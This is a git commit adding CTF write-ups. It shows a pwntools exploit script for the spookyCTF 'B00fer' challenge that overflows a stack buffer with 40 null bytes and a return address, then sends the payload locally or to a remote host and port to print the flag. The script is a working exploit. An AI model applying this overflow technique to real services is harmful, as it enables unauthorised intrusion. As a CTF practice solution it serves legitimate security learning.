Adds CTFs to content

Add CTFs from 2024 to the content, htb apocalypse, spookyCTF, buckeye ctf and some edits to the 404 ctf
2025-06-27 14:45:23 +02:00
parent 8dea24f3a2
commit 34634f73c1
24 changed files with 2428 additions and 3 deletions
--- a/content/writeups/2024/spookyCTF/pwn/B00fer/exploit.py
+++ b/content/writeups/2024/spookyCTF/pwn/B00fer/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/python3
+from pwn import *
+
+# Allows you to switch between local/GDB/remote from terminal
+def start(argv=[], *a, **kw):
+    if args.GDB:  # Set GDBscript below
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    elif args.REMOTE:  # ('server', 'port')
+        return remote(sys.argv[1], sys.argv[2], *a, **kw)
+    elif args.SSH:
+        exe = remote_exe
+        s=ssh(host='HOST',user='LOGIN',password='PASSWORD',port=0000)
+        return s.process([exe] + argv)
+    else:  # Run locally
+        exe = local_exe
+        return process([exe] + argv, *a, **kw)
+
+
+# Specify your GDB script here for debugging
+gdbscript = '''
+'''.format(**locals())
+
+
+# Set up pwntools for the correct architecture
+local_exe = 'B00fer'
+remote_exe = 'REMOTE'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(local_exe, checksec=False)
+# Change logging level to help with debugging (error/warning/info/debug)
+#context.log_level = 'debug'
+context.log_level = 'error'
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+
+payload = flat(
+        b'\x00'*5*8,
+        p64(0x401227) 
+        )
+
+write("payload", payload)
+
+io = start()
+
+io.sendlineafter(b'Hi there NICC! This program is 100% and there is NO WAY you are getting our flag.\n', payload)
+
+io.recvline().decode()
+print(io.recvline().decode())